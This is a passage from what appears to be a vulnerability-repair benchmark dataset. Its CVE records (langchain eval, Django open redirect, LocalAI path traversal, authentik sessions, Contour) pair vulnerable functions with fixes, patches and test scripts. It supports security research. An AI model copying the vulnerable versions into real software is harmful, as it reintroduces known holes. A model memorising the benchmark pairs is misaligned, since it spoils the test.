Errors.ATTACHMENT_NOT_FOUND);\n\n const isBoardMember = await sails.helpers.users.isBoardMember(currentUser.id, card.boardId);\n\n if (!isBoardMember) {\n const isProjectManager = await sails.helpers.users.isProjectManager(\n currentUser.id,\n project.id,\n );\n\n if (!isProjectManager) {\n throw Errors.ATTACHMENT_NOT_FOUND; // Forbidden\n }\n }\n\n if (!attachment.image) {\n throw Errors.ATTACHMENT_NOT_FOUND;\n }\n\n const filePath = path.join(\n sails.config.custom.attachmentsPath,\n attachment.dirname,\n 'thumbnails',\n 'cover-256.jpg',\n );\n\n if (!fs.existsSync(filePath)) {\n throw Errors.ATTACHMENT_NOT_FOUND;\n }\n\n this.res.type('image/jpeg');\n this.res.set('Cache-Control', 'private, max-age=900'); // TODO: move to config\n\n return exits.success(fs.createReadStream(filePath));\n },\n};"}, {"id": "fix_js_249_3", "commit": "ac1df5201dfdaf68d37f7e1b272bc137870d7418", "file_path": "server/config/routes.js", "start_line": 83, "end_line": 86, "snippet": " 'GET /attachments/:id/download/thumbnails/cover-256.jpg': {\n action: 'attachments/download-thumbnail',\n skipAssets: false,\n },"}], "vul_patch": "--- a/server/api/controllers/attachments/download-thumbnail.js\n+++ b/server/api/controllers/attachments/download-thumbnail.js\n@@ -5,8 +5,4 @@\n regex: /^[0-9]+$/,\n required: true,\n },\n- filename: {\n- type: 'string',\n- required: true,\n- },\n },\n\n--- a/server/api/controllers/attachments/download-thumbnail.js\n+++ b/server/api/controllers/attachments/download-thumbnail.js\n@@ -26,14 +26,14 @@\n sails.config.custom.attachmentsPath,\n attachment.dirname,\n 'thumbnails',\n- inputs.filename,\n+ 'cover-256.jpg',\n );\n \n if (!fs.existsSync(filePath)) {\n throw Errors.ATTACHMENT_NOT_FOUND;\n }\n \n- this.res.type(attachment.filename);\n+ this.res.type('image/jpeg');\n this.res.set('Cache-Control', 'private, max-age=900'); // TODO: move to config\n \n return exits.success(fs.createReadStream(filePath));\n\n--- a/server/config/routes.js\n+++ b/server/config/routes.js\n@@ -1,4 +1,4 @@\n- 'GET /attachments/:id/download/thumbnails/:filename': {\n+ 'GET /attachments/:id/download/thumbnails/cover-256.jpg': {\n action: 'attachments/download-thumbnail',\n skipAssets: false,\n },\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-21513", "cve_description": "Versions of the package langchain-experimental from 0.0.15 and before 0.0.21 are vulnerable to Arbitrary Code Execution when retrieving values from the database, the code will attempt to call 'eval' on all values. An attacker can exploit this vulnerability and execute arbitrary python code if they can control the input prompt and the server is configured with VectorSQLDatabaseChain.\r\r**Notes:**\r\rImpact on the Confidentiality, Integrity and Availability of the vulnerable component:\r\rConfidentiality: Code execution happens within the impacted component, in this case langchain-experimental, so all resources are necessarily accessible.\r\rIntegrity: There is nothing protected by the impacted component inherently. Although anything returned from the component counts as 'information' for which the trustworthiness can be compromised.\r\rAvailability: The loss of availability isn't caused by the attack itself, but it happens as a result during the attacker's post-exploitation steps.\r\r\rImpact on the Confidentiality, Integrity and Availability of the subsequent system:\r\rAs a legitimate low-privileged user of the package (PR:L) the attacker does not have more access to data owned by the package as a result of this vulnerability than they did with normal usage (e.g. can query the DB). The unintended action that one can perform by breaking out of the app environment and exfiltrating files, making remote connections etc. happens during the post exploitation phase in the subsequent system - in this case, the OS.\r\rAT:P: An attacker needs to be able to influence the input prompt, whilst the server is configured with the VectorSQLDatabaseChain plugin.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/langchain-ai/langchain", "patch_url": ["https://github.com/langchain-ai/langchain/commit/7b13292e3544b2f5f2bfb8a27a062ea2b0c34561"], "programing_language": "Python", "vul_func": [{"id": "vul_py_223_1", "commit": "b809c24", "file_path": "libs/experimental/langchain_experimental/sql/vector_sql.py", "start_line": 86, "end_line": 95, "snippet": "def get_result_from_sqldb(\n db: SQLDatabase, cmd: str\n) -> Union[str, List[Dict[str, Any]], Dict[str, Any]]:\n result = db._execute(cmd, fetch=\"all\") # type: ignore\n if isinstance(result, list):\n return [{k: _try_eval(v) for k, v in dict(d._asdict()).items()} for d in result]\n else:\n return {\n k: _try_eval(v) for k, v in dict(result._asdict()).items() # type: ignore\n }"}], "fix_func": [{"id": "fix_py_223_1", "commit": "7b13292", "file_path": "libs/experimental/langchain_experimental/sql/vector_sql.py", "start_line": 79, "end_line": 83, "snippet": "def get_result_from_sqldb(\n db: SQLDatabase, cmd: str\n) -> Union[str, List[Dict[str, Any]], Dict[str, Any]]:\n result = db._execute(cmd, fetch=\"all\") # type: ignore\n return result"}], "vul_patch": "--- a/libs/experimental/langchain_experimental/sql/vector_sql.py\n+++ b/libs/experimental/langchain_experimental/sql/vector_sql.py\n@@ -2,9 +2,4 @@\n db: SQLDatabase, cmd: str\n ) -> Union[str, List[Dict[str, Any]], Dict[str, Any]]:\n result = db._execute(cmd, fetch=\"all\") # type: ignore\n- if isinstance(result, list):\n- return [{k: _try_eval(v) for k, v in dict(d._asdict()).items()} for d in result]\n- else:\n- return {\n- k: _try_eval(v) for k, v in dict(result._asdict()).items() # type: ignore\n- }\n+ return result\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-29928", "cve_description": "authentik is an open-source identity provider. Prior to versions 2024.12.4 and 2025.2.3, when authentik was configured to use the database for session storage (which is a non-default setting), deleting sessions via the Web Interface or the API would not revoke the session and the session holder would continue to have access to authentik. authentik 2025.2.3 and 2024.12.4 fix this issue. Switching to the cache-based session storage until the authentik instance can be upgraded is recommended. This will however also delete all existing sessions and users will have to re-authenticate.", "cwe_info": {"CWE-384": {"name": "Session Fixation", "description": "Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions."}}, "repo": "https://github.com/goauthentik/authentik", "patch_url": ["https://github.com/goauthentik/authentik/commit/71294b7deb6eb5726a782de83b957eaf25fc4cf6"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_202_1", "commit": "5af907d", "file_path": "authentik/core/api/users.py", "start_line": 771, "end_line": 780, "snippet": " def partial_update(self, request: Request, *args, **kwargs) -> Response:\n response = super().partial_update(request, *args, **kwargs)\n instance: User = self.get_object()\n if not instance.is_active:\n sessions = AuthenticatedSession.objects.filter(user=instance)\n session_ids = sessions.values_list(\"session_key\", flat=True)\n cache.delete_many(f\"{KEY_PREFIX}{session}\" for session in session_ids)\n sessions.delete()\n LOGGER.debug(\"Deleted user's sessions\", user=instance.username)\n return response"}, {"id": "vul_js_202_2", "commit": "5af907d", "file_path": "authentik/core/signals.py", "start_line": 61, "end_line": 64, "snippet": "def authenticated_session_delete(sender: type[Model], instance: \"AuthenticatedSession\", **_):\n \"\"\"Delete session when authenticated session is deleted\"\"\"\n cache_key = f\"{KEY_PREFIX}{instance.session_key}\"\n cache.delete(cache_key)"}], "fix_func": [{"id": "fix_js_202_1", "commit": "71294b7", "file_path": "authentik/core/api/users.py", "start_line": 773, "end_line": 783, "snippet": " def partial_update(self, request: Request, *args, **kwargs) -> Response:\n response = super().partial_update(request, *args, **kwargs)\n instance: User = self.get_object()\n if not instance.is_active:\n sessions = AuthenticatedSession.objects.filter(user=instance)\n session_ids = sessions.values_list(\"session_key\", flat=True)\n for session in session_ids:\n SessionStore(session).delete()\n sessions.delete()\n LOGGER.debug(\"Deleted user's sessions\", user=instance.username)\n return response"}, {"id": "fix_js_202_2", "commit": "71294b7", "file_path": "authentik/core/signals.py", "start_line": 65, "end_line": 67, "snippet": "def authenticated_session_delete(sender: type[Model], instance: \"AuthenticatedSession\", **_):\n \"\"\"Delete session when authenticated session is deleted\"\"\"\n SessionStore(instance.session_key).delete()"}], "vul_patch": "--- a/authentik/core/api/users.py\n+++ b/authentik/core/api/users.py\n@@ -4,7 +4,8 @@\n if not instance.is_active:\n sessions = AuthenticatedSession.objects.filter(user=instance)\n session_ids = sessions.values_list(\"session_key\", flat=True)\n- cache.delete_many(f\"{KEY_PREFIX}{session}\" for session in session_ids)\n+ for session in session_ids:\n+ SessionStore(session).delete()\n sessions.delete()\n LOGGER.debug(\"Deleted user's sessions\", user=instance.username)\n return response\n\n--- a/authentik/core/signals.py\n+++ b/authentik/core/signals.py\n@@ -1,4 +1,3 @@\n def authenticated_session_delete(sender: type[Model], instance: \"AuthenticatedSession\", **_):\n \"\"\"Delete session when authenticated session is deleted\"\"\"\n- cache_key = f\"{KEY_PREFIX}{instance.session_key}\"\n- cache.delete(cache_key)\n+ SessionStore(instance.session_key).delete()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-14574", "cve_description": "django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/d6eaee092709aad477a9894598496c6deec532ff", "https://github.com/django/django/commit/c4e5ff7fdb5fce447675e90291fd33fddd052b3c", "https://github.com/django/django/commit/6fffc3c6d420e44f4029d5643f38d00a39b08525"], "programing_language": "Python", "vul_func": [{"id": "vul_py_10_1", "commit": "af344691114e4a68334c30543bfb838996328212", "file_path": "django/middleware/common.py", "start_line": 83, "end_line": 102, "snippet": " def get_full_path_with_slash(self, request):\n \"\"\"\n Return the full path of the request with a trailing slash appended.\n\n Raise a RuntimeError if settings.DEBUG is True and request.method is\n POST, PUT, or PATCH.\n \"\"\"\n new_path = request.get_full_path(force_append_slash=True)\n if settings.DEBUG and request.method in ('POST', 'PUT', 'PATCH'):\n raise RuntimeError(\n \"You called this URL via %(method)s, but the URL doesn't end \"\n \"in a slash and you have APPEND_SLASH set. Django can't \"\n \"redirect to the slash URL while maintaining %(method)s data. \"\n \"Change your form to point to %(url)s (note the trailing \"\n \"slash), or set APPEND_SLASH=False in your Django settings.\" % {\n 'method': request.method,\n 'url': request.get_host() + new_path,\n }\n )\n return new_path"}, {"id": "vul_py_10_2", "commit": "af344691114e4a68334c30543bfb838996328212", "file_path": "django/urls/resolvers.py", "start_line": 564, "end_line": 636, "snippet": " def _reverse_with_prefix(self, lookup_view, _prefix, *args, **kwargs):\n if args and kwargs:\n raise ValueError(\"Don't mix *args and **kwargs in call to reverse()!\")\n\n if not self._populated:\n self._populate()\n\n possibilities = self.reverse_dict.getlist(lookup_view)\n\n for possibility, pattern, defaults, converters in possibilities:\n for result, params in possibility:\n if args:\n if len(args) != len(params):\n continue\n candidate_subs = dict(zip(params, args))\n else:\n if set(kwargs).symmetric_difference(params).difference(defaults):\n continue\n matches = True\n for k, v in defaults.items():\n if kwargs.get(k, v) != v:\n matches = False\n break\n if not matches:\n continue\n candidate_subs = kwargs\n # Convert the candidate subs to text using Converter.to_url().\n text_candidate_subs = {}\n for k, v in candidate_subs.items():\n if k in converters:\n text_candidate_subs[k] = converters[k].to_url(v)\n else:\n text_candidate_subs[k] = str(v)\n # WSGI provides decoded URLs, without %xx escapes, and the URL\n # resolver operates on such URLs. First substitute arguments\n # without quoting to build a decoded URL and look for a match.\n # Then, if we have a match, redo the substitution with quoted\n # arguments in order to return a properly encoded URL.\n candidate_pat = _prefix.replace('%', '%%') + result\n if re.search('^%s%s' % (re.escape(_prefix), pattern), candidate_pat % text_candidate_subs):\n # safe characters from `pchar` definition of RFC 3986\n url = quote(candidate_pat % text_candidate_subs, safe=RFC3986_SUBDELIMS + '/~:@')\n # Don't allow construction of scheme relative urls.\n if url.startswith('//'):\n url = '/%%2F%s' % url[2:]\n return url\n # lookup_view can be URL name or callable, but callables are not\n # friendly in error messages.\n m = getattr(lookup_view, '__module__', None)\n n = getattr(lookup_view, '__name__', None)\n if m is not None and n is not None:\n lookup_view_s = \"%s.%s\" % (m, n)\n else:\n lookup_view_s = lookup_view\n\n patterns = [pattern for (_, pattern, _, _) in possibilities]\n if patterns:\n if args:\n arg_msg = \"arguments '%s'\" % (args,)\n elif kwargs:\n arg_msg = \"keyword arguments '%s'\" % (kwargs,)\n else:\n arg_msg = \"no arguments\"\n msg = (\n \"Reverse for '%s' with %s not found. %d pattern(s) tried: %s\" %\n (lookup_view_s, arg_msg, len(patterns), patterns)\n )\n else:\n msg = (\n \"Reverse for '%(view)s' not found. '%(view)s' is not \"\n \"a valid view function or pattern name.\" % {'view': lookup_view_s}\n )\n raise NoReverseMatch(msg)"}], "fix_func": [{"id": "fix_py_10_1", "commit": "6fffc3c6d420e44f4029d5643f38d00a39b08525", "file_path": "django/middleware/common.py", "start_line": 84, "end_line": 105, "snippet": " def get_full_path_with_slash(self, request):\n \"\"\"\n Return the full path of the request with a trailing slash appended.\n\n Raise a RuntimeError if settings.DEBUG is True and request.method is\n POST, PUT, or PATCH.\n \"\"\"\n new_path = request.get_full_path(force_append_slash=True)\n # Prevent construction of scheme relative urls.\n new_path = escape_leading_slashes(new_path)\n if settings.DEBUG and request.method in ('POST', 'PUT', 'PATCH'):\n raise RuntimeError(\n \"You called this URL via %(method)s, but the URL doesn't end \"\n \"in a slash and you have APPEND_SLASH set. Django can't \"\n \"redirect to the slash URL while maintaining %(method)s data. \"\n \"Change your form to point to %(url)s (note the trailing \"\n \"slash), or set APPEND_SLASH=False in your Django settings.\" % {\n 'method': request.method,\n 'url': request.get_host() + new_path,\n }\n )\n return new_path"}, {"id": "fix_py_10_2", "commit": "6fffc3c6d420e44f4029d5643f38d00a39b08525", "file_path": "django/urls/resolvers.py", "start_line": 564, "end_line": 634, "snippet": " def _reverse_with_prefix(self, lookup_view, _prefix, *args, **kwargs):\n if args and kwargs:\n raise ValueError(\"Don't mix *args and **kwargs in call to reverse()!\")\n\n if not self._populated:\n self._populate()\n\n possibilities = self.reverse_dict.getlist(lookup_view)\n\n for possibility, pattern, defaults, converters in possibilities:\n for result, params in possibility:\n if args:\n if len(args) != len(params):\n continue\n candidate_subs = dict(zip(params, args))\n else:\n if set(kwargs).symmetric_difference(params).difference(defaults):\n continue\n matches = True\n for k, v in defaults.items():\n if kwargs.get(k, v) != v:\n matches = False\n break\n if not matches:\n continue\n candidate_subs = kwargs\n # Convert the candidate subs to text using Converter.to_url().\n text_candidate_subs = {}\n for k, v in candidate_subs.items():\n if k in converters:\n text_candidate_subs[k] = converters[k].to_url(v)\n else:\n text_candidate_subs[k] = str(v)\n # WSGI provides decoded URLs, without %xx escapes, and the URL\n # resolver operates on such URLs. First substitute arguments\n # without quoting to build a decoded URL and look for a match.\n # Then, if we have a match, redo the substitution with quoted\n # arguments in order to return a properly encoded URL.\n candidate_pat = _prefix.replace('%', '%%') + result\n if re.search('^%s%s' % (re.escape(_prefix), pattern), candidate_pat % text_candidate_subs):\n # safe characters from `pchar` definition of RFC 3986\n url = quote(candidate_pat % text_candidate_subs, safe=RFC3986_SUBDELIMS + '/~:@')\n # Don't allow construction of scheme relative urls.\n return escape_leading_slashes(url)\n # lookup_view can be URL name or callable, but callables are not\n # friendly in error messages.\n m = getattr(lookup_view, '__module__', None)\n n = getattr(lookup_view, '__name__', None)\n if m is not None and n is not None:\n lookup_view_s = \"%s.%s\" % (m, n)\n else:\n lookup_view_s = lookup_view\n\n patterns = [pattern for (_, pattern, _, _) in possibilities]\n if patterns:\n if args:\n arg_msg = \"arguments '%s'\" % (args,)\n elif kwargs:\n arg_msg = \"keyword arguments '%s'\" % (kwargs,)\n else:\n arg_msg = \"no arguments\"\n msg = (\n \"Reverse for '%s' with %s not found. %d pattern(s) tried: %s\" %\n (lookup_view_s, arg_msg, len(patterns), patterns)\n )\n else:\n msg = (\n \"Reverse for '%(view)s' not found. '%(view)s' is not \"\n \"a valid view function or pattern name.\" % {'view': lookup_view_s}\n )\n raise NoReverseMatch(msg)"}], "vul_patch": "--- a/django/middleware/common.py\n+++ b/django/middleware/common.py\n@@ -6,6 +6,8 @@\n POST, PUT, or PATCH.\n \"\"\"\n new_path = request.get_full_path(force_append_slash=True)\n+ # Prevent construction of scheme relative urls.\n+ new_path = escape_leading_slashes(new_path)\n if settings.DEBUG and request.method in ('POST', 'PUT', 'PATCH'):\n raise RuntimeError(\n \"You called this URL via %(method)s, but the URL doesn't end \"\n\n--- a/django/urls/resolvers.py\n+++ b/django/urls/resolvers.py\n@@ -41,9 +41,7 @@\n # safe characters from `pchar` definition of RFC 3986\n url = quote(candidate_pat % text_candidate_subs, safe=RFC3986_SUBDELIMS + '/~:@')\n # Don't allow construction of scheme relative urls.\n- if url.startswith('//'):\n- url = '/%%2F%s' % url[2:]\n- return url\n+ return escape_leading_slashes(url)\n # lookup_view can be URL name or callable, but callables are not\n # friendly in error messages.\n m = getattr(lookup_view, '__module__', None)\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2018-14574:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2018-14574/bin/python ./runtests.py middleware.tests.CommonMiddlewareTest.test_append_slash_leading_slashes utils_tests.test_http.EscapeLeadingSlashesTests\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2018-14574:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2018-14574/bin/python ./runtests.py middleware.tests\n"} {"cve_id": "CVE-2024-5182", "cve_description": "A path traversal vulnerability exists in mudler/localai version 2.14.0, where an attacker can exploit the `model` parameter during the model deletion process to delete arbitrary files. Specifically, by crafting a request with a manipulated `model` parameter, an attacker can traverse the directory structure and target files outside of the intended directory, leading to the deletion of sensitive data. This vulnerability is due to insufficient input validation and sanitization of the `model` parameter.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/mudler/localai", "patch_url": ["https://github.com/mudler/localai/commit/1a3dedece06cab1acc3332055d285ac540a47f0e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_275_1", "commit": "a58ff00ab1cfcad4bf109b83823db1e2807999e4", "file_path": "core/config/backend_config_loader.go", "start_line": 137, "end_line": 149, "snippet": "func (cm *BackendConfigLoader) LoadBackendConfigFile(file string, opts ...ConfigLoaderOption) error {\n\tcm.Lock()\n\tdefer cm.Unlock()\n\tc, err := ReadBackendConfigFile(file, opts...)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot load config file: %w\", err)\n\t}\n\n\tfor _, cc := range c {\n\t\tcm.configs[cc.Name] = *cc\n\t}\n\treturn nil\n}"}, {"id": "vul_go_275_2", "commit": "a58ff00ab1cfcad4bf109b83823db1e2807999e4", "file_path": "core/config/backend_config_loader.go", "start_line": 151, "end_line": 161, "snippet": "func (cl *BackendConfigLoader) LoadBackendConfig(file string, opts ...ConfigLoaderOption) error {\n\tcl.Lock()\n\tdefer cl.Unlock()\n\tc, err := ReadBackendConfig(file, opts...)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot read config file: %w\", err)\n\t}\n\n\tcl.configs[c.Name] = *c\n\treturn nil\n}"}, {"id": "vul_go_275_3", "commit": "a58ff00ab1cfcad4bf109b83823db1e2807999e4", "file_path": "core/config/backend_config_loader.go", "start_line": 295, "end_line": 323, "snippet": "func (cm *BackendConfigLoader) LoadBackendConfigsFromPath(path string, opts ...ConfigLoaderOption) error {\n\tcm.Lock()\n\tdefer cm.Unlock()\n\tentries, err := os.ReadDir(path)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfiles := make([]fs.FileInfo, 0, len(entries))\n\tfor _, entry := range entries {\n\t\tinfo, err := entry.Info()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfiles = append(files, info)\n\t}\n\tfor _, file := range files {\n\t\t// Skip templates, YAML and .keep files\n\t\tif !strings.Contains(file.Name(), \".yaml\") && !strings.Contains(file.Name(), \".yml\") ||\n\t\t\tstrings.HasPrefix(file.Name(), \".\") {\n\t\t\tcontinue\n\t\t}\n\t\tc, err := ReadBackendConfig(filepath.Join(path, file.Name()), opts...)\n\t\tif err == nil {\n\t\t\tcm.configs[c.Name] = *c\n\t\t}\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_275_1", "commit": "1a3dedece06cab1acc3332055d285ac540a47f0e", "file_path": "core/config/backend_config_loader.go", "start_line": 137, "end_line": 151, "snippet": "func (cm *BackendConfigLoader) LoadBackendConfigFile(file string, opts ...ConfigLoaderOption) error {\n\tcm.Lock()\n\tdefer cm.Unlock()\n\tc, err := ReadBackendConfigFile(file, opts...)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot load config file: %w\", err)\n\t}\n\n\tfor _, cc := range c {\n\t\tif cc.Validate() {\n\t\t\tcm.configs[cc.Name] = *cc\n\t\t}\n\t}\n\treturn nil\n}"}, {"id": "fix_go_275_2", "commit": "1a3dedece06cab1acc3332055d285ac540a47f0e", "file_path": "core/config/backend_config_loader.go", "start_line": 153, "end_line": 168, "snippet": "func (cl *BackendConfigLoader) LoadBackendConfig(file string, opts ...ConfigLoaderOption) error {\n\tcl.Lock()\n\tdefer cl.Unlock()\n\tc, err := ReadBackendConfig(file, opts...)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot read config file: %w\", err)\n\t}\n\n\tif c.Validate() {\n\t\tcl.configs[c.Name] = *c\n\t} else {\n\t\treturn fmt.Errorf(\"config is not valid\")\n\t}\n\n\treturn nil\n}"}, {"id": "fix_go_275_3", "commit": "1a3dedece06cab1acc3332055d285ac540a47f0e", "file_path": "core/config/backend_config_loader.go", "start_line": 302, "end_line": 336, "snippet": "func (cm *BackendConfigLoader) LoadBackendConfigsFromPath(path string, opts ...ConfigLoaderOption) error {\n\tcm.Lock()\n\tdefer cm.Unlock()\n\tentries, err := os.ReadDir(path)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot read directory '%s': %w\", path, err)\n\t}\n\tfiles := make([]fs.FileInfo, 0, len(entries))\n\tfor _, entry := range entries {\n\t\tinfo, err := entry.Info()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfiles = append(files, info)\n\t}\n\tfor _, file := range files {\n\t\t// Skip templates, YAML and .keep files\n\t\tif !strings.Contains(file.Name(), \".yaml\") && !strings.Contains(file.Name(), \".yml\") ||\n\t\t\tstrings.HasPrefix(file.Name(), \".\") {\n\t\t\tcontinue\n\t\t}\n\t\tc, err := ReadBackendConfig(filepath.Join(path, file.Name()), opts...)\n\t\tif err != nil {\n\t\t\tlog.Error().Err(err).Msgf(\"cannot read config file: %s\", file.Name())\n\t\t\tcontinue\n\t\t}\n\t\tif c.Validate() {\n\t\t\tcm.configs[c.Name] = *c\n\t\t} else {\n\t\t\tlog.Error().Err(err).Msgf(\"config is not valid\")\n\t\t}\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/core/config/backend_config_loader.go\n+++ b/core/config/backend_config_loader.go\n@@ -7,7 +7,9 @@\n \t}\n \n \tfor _, cc := range c {\n-\t\tcm.configs[cc.Name] = *cc\n+\t\tif cc.Validate() {\n+\t\t\tcm.configs[cc.Name] = *cc\n+\t\t}\n \t}\n \treturn nil\n }\n\n--- a/core/config/backend_config_loader.go\n+++ b/core/config/backend_config_loader.go\n@@ -6,6 +6,11 @@\n \t\treturn fmt.Errorf(\"cannot read config file: %w\", err)\n \t}\n \n-\tcl.configs[c.Name] = *c\n+\tif c.Validate() {\n+\t\tcl.configs[c.Name] = *c\n+\t} else {\n+\t\treturn fmt.Errorf(\"config is not valid\")\n+\t}\n+\n \treturn nil\n }\n\n--- a/core/config/backend_config_loader.go\n+++ b/core/config/backend_config_loader.go\n@@ -3,7 +3,7 @@\n \tdefer cm.Unlock()\n \tentries, err := os.ReadDir(path)\n \tif err != nil {\n-\t\treturn err\n+\t\treturn fmt.Errorf(\"cannot read directory '%s': %w\", path, err)\n \t}\n \tfiles := make([]fs.FileInfo, 0, len(entries))\n \tfor _, entry := range entries {\n@@ -20,8 +20,14 @@\n \t\t\tcontinue\n \t\t}\n \t\tc, err := ReadBackendConfig(filepath.Join(path, file.Name()), opts...)\n-\t\tif err == nil {\n+\t\tif err != nil {\n+\t\t\tlog.Error().Err(err).Msgf(\"cannot read config file: %s\", file.Name())\n+\t\t\tcontinue\n+\t\t}\n+\t\tif c.Validate() {\n \t\t\tcm.configs[c.Name] = *c\n+\t\t} else {\n+\t\t\tlog.Error().Err(err).Msgf(\"config is not valid\")\n \t\t}\n \t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-32783", "cve_description": "Contour is a Kubernetes ingress controller using Envoy proxy. In Contour before version 1.17.1 a specially crafted ExternalName type Service may be used to access Envoy's admin interface, which Contour normally prevents from access outside the Envoy container. This can be used to shut down Envoy remotely (a denial of service), or to expose the existence of any Secret that Envoy is using for its configuration, including most notably TLS Keypairs. However, it *cannot* be used to get the *content* of those secrets. Since this attack allows access to the administration interface, a variety of administration options are available, such as shutting down the Envoy or draining traffic. In general, the Envoy admin interface cannot easily be used for making changes to the cluster, in-flight requests, or backend services, but it could be used to shut down or drain Envoy, change traffic routing, or to retrieve secret metadata, as mentioned above. The issue will be addressed in Contour v1.18.0 and a cherry-picked patch release, v1.17.1, has been released to cover users who cannot upgrade at this time. For more details refer to the linked GitHub Security Advisory.", "cwe_info": {"CWE-610": {"name": "Externally Controlled Reference to a Resource in Another Sphere", "description": "The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere."}}, "repo": "https://github.com/projectcontour/contour", "patch_url": ["https://github.com/projectcontour/contour/commit/b53a5c4fd927f4ea2c6cf02f1359d8e28bef852e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_42_1", "commit": "b8136f7", "file_path": "internal/dag/accessors.go", "start_line": 54, "end_line": 79, "snippet": "func (dag *DAG) EnsureService(meta types.NamespacedName, port intstr.IntOrString, cache *KubernetesCache) (*Service, error) {\n\tsvc, svcPort, err := cache.LookupService(meta, port)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif dagSvc := dag.GetService(k8s.NamespacedNameOf(svc), svcPort.Port); dagSvc != nil {\n\t\treturn dagSvc, nil\n\t}\n\n\tdagSvc := &Service{\n\t\tWeighted: WeightedService{\n\t\t\tServiceName: svc.Name,\n\t\t\tServiceNamespace: svc.Namespace,\n\t\t\tServicePort: svcPort,\n\t\t\tWeight: 1,\n\t\t},\n\t\tProtocol: upstreamProtocol(svc, svcPort),\n\t\tMaxConnections: annotation.MaxConnections(svc),\n\t\tMaxPendingRequests: annotation.MaxPendingRequests(svc),\n\t\tMaxRequests: annotation.MaxRequests(svc),\n\t\tMaxRetries: annotation.MaxRetries(svc),\n\t\tExternalName: externalName(svc),\n\t}\n\treturn dagSvc, nil\n}"}], "fix_func": [{"id": "fix_go_42_1", "commit": "b53a5c4", "file_path": "internal/dag/accessors.go", "start_line": 54, "end_line": 84, "snippet": "func (dag *DAG) EnsureService(meta types.NamespacedName, port intstr.IntOrString, cache *KubernetesCache, enableExternalNameSvc bool) (*Service, error) {\n\tsvc, svcPort, err := cache.LookupService(meta, port)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\terr = validateExternalName(svc, enableExternalNameSvc)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif dagSvc := dag.GetService(k8s.NamespacedNameOf(svc), svcPort.Port); dagSvc != nil {\n\t\treturn dagSvc, nil\n\t}\n\n\tdagSvc := &Service{\n\t\tWeighted: WeightedService{\n\t\t\tServiceName: svc.Name,\n\t\t\tServiceNamespace: svc.Namespace,\n\t\t\tServicePort: svcPort,\n\t\t\tWeight: 1,\n\t\t},\n\t\tProtocol: upstreamProtocol(svc, svcPort),\n\t\tMaxConnections: annotation.MaxConnections(svc),\n\t\tMaxPendingRequests: annotation.MaxPendingRequests(svc),\n\t\tMaxRequests: annotation.MaxRequests(svc),\n\t\tMaxRetries: annotation.MaxRetries(svc),\n\t\tExternalName: externalName(svc),\n\t}\n\treturn dagSvc, nil\n}"}, {"id": "fix_go_42_2", "commit": "b53a5c4", "file_path": "internal/dag/accessors.go", "start_line": 86, "end_line": 116, "snippet": "func validateExternalName(svc *v1.Service, enableExternalNameSvc bool) error {\n\n\t// If this isn't an ExternalName Service, we're all good here.\n\ten := externalName(svc)\n\tif en == \"\" {\n\t\treturn nil\n\t}\n\n\t// If ExternalNames are disabled, then we don't want to add this to the DAG.\n\tif !enableExternalNameSvc {\n\t\treturn fmt.Errorf(\"%s/%s is an ExternalName service, these are not currently enabled. See the config.enableExternalNameService config file setting\", svc.Namespace, svc.Name)\n\t}\n\n\t// Check against a list of known localhost names, using a map to approximate a set.\n\t// TODO(youngnick) This is a very porous hack, 